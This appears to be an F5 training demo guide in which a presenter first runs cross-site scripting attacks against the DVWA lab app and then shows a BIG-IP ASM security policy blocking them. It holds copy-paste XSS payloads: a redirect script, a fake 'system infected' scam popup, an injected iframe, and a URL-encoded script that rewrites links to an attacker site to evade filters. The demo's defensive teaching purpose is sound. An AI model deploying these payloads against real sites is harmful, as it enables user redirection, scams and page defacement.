Professional Documents
Culture Documents
Ravello Demo - ASM - Blocking Cross-Site Scripting Attacks - V13.0.A
Ravello Demo - ASM - Blocking Cross-Site Scripting Attacks - V13.0.A
Ravello Demo - ASM - Blocking Cross-Site Scripting Attacks - V13.0.A
The purpose of this demo is to show how to create an ASM security policy that will protect a web application
against cross-site scripting attacks. You’ll start by showing several cross-site scripting attacks on a vulnerable
web site. You’ll then create a security policy using the Rapid Deployment policy template. You’ll then show the
same attacks being blocked by the ASM security policy. Finally, you’ll show the ASM logs to view the attack
signatures that were detected by ASM.
Contact Chris Manly (c.manly@f5.com) with any questions or feedback for this demo.
©2017 F5 Networks, Inc. All rights reserved. F5, F5 Networks, and the F5 logo are trademarks of F5 Networks, Inc. in the U.S. and in
certain other countries. Other F5 trademarks are identified at f5.com.
Any other products, services, or company names referenced herein may be trademarks of their respective owners with no endorsement or
affiliation, express or implied, claimed by F5.
These training materials and documentation are F5 Confidential Information and are subject to the F5 Networks Reseller Agreement. You
may not share these training materials and documentation with any third party without the express written permission of F5.
ASM Demo – Blocking Cross-Site Scripting Attacks
Open an InPrivate Browsing window (IE) and click the DVWA bookmark.
WWFE Ravello Guides – Demo: ASM – Blocking Cross-Site Scripting Attacks; v13.0.A Page | 3
ASM Demo – Blocking Cross-Site Scripting Attacks
Click XSS reflected, then copy and paste the following into the field and then click Submit.
<script>window.location="http://www.hackthissite.org"</script>
We’re redirected to a different web site.
Click the DVWA bookmark, then click XSS stored, then create an entry named Popup, then copy and
paste the following Message, and then click Sign Guestbook.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>
The information in the message field is JavaScript code. The user is presented with an alert dialog box.
Using cross-site scripting, a hacker could add anything that JavaScript can do into the field.
Create another entry named iFrame, then copy and paste the following Message, then
click Sign Guestbook, and then scroll down the page.
<iframe src="https://www.f5.com" width="600" height="500"></iframe>
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>
The hacker used an iframe to display a different web site on this web page. All users will see this page
when they access this comments page.
Create another guestbook entry named Encoding, then copy and paste the following Message, then
click Sign Guestbook, and then scroll down the page.
index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%6
6%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%
67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b
%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%6
5%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e
The contents of this attack are encoded, designed to bypass security measures. Cross-site scripting is
a powerful exploit because a hacker can insert any form of script code into the database.
Click Setup, then click Create / Reset Database, and then click Logout.
In the Configuration Utility, open the Virtual Server List page and click dvwa_virtual.
This is a standard HTTP virtual server that listens on 10.1.10.35. Note that this virtual server contains
the default http profile. An HTTP profile is required to protect against application layer attacks.
Open the Application Security > Security Policies > Policies List page, and then click Create New Policy.
Select the Advanced options.
Use the following information for the new policy, and then click Create Policy.
Policy Name xss_security_policy
Policy Template Rapid Deployment Policy
Virtual Server dvwa_virtual
Enforcement Mode Blocking
Signature Staging Disabled
WWFE Ravello Guides – Demo: ASM – Blocking Cross-Site Scripting Attacks; v13.0.A Page | 4
ASM Demo – Blocking Cross-Site Scripting Attacks
Click the DVWA bookmark, then click XSS stored, then create an entry named Popup, then copy and
paste the following Message, and then click Sign Guestbook.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>
Click the DVWA bookmark, then click XSS stored, then create an entry named iFrame, then copy and
paste the following Message, and then click Sign Guestbook.
<iframe src="https://www.f5.com" width="600" height="500"></iframe>
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>
Click the DVWA bookmark, then click XSS stored, then create a guestbook entry named Encoding, then
copy and paste the following Message, and then click Sign Guestbook.
%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%6
9%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%
65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68
%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2
f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e
From the very easy to configure security policy, all the web application user input fields are now
protected against cross-site scripting attacks.
In the Configuration Utility, open the Security > Event Logs > Application > Requests page.
Note the number of blocked entries.
Select the /login.php log entry.
Click Attack signature detected.
We can view the different attack signatures that were detected, the actual parameter that was
attacked (username), and the value that was input by the malicious user.
Examine the attack type.
This was identified as a Cross Site Scripting (XSS) attack.
WWFE Ravello Guides – Demo: ASM – Blocking Cross-Site Scripting Attacks; v13.0.A Page | 5
ASM Demo – Blocking Cross-Site Scripting Attacks
Click on the triangle icon after Cross Site Scripting (XSS).
That concludes this demonstration on using BIG-IP ASM to block cross-site scripting attacks.
WWFE Ravello Guides – Demo: ASM – Blocking Cross-Site Scripting Attacks; v13.0.A Page | 6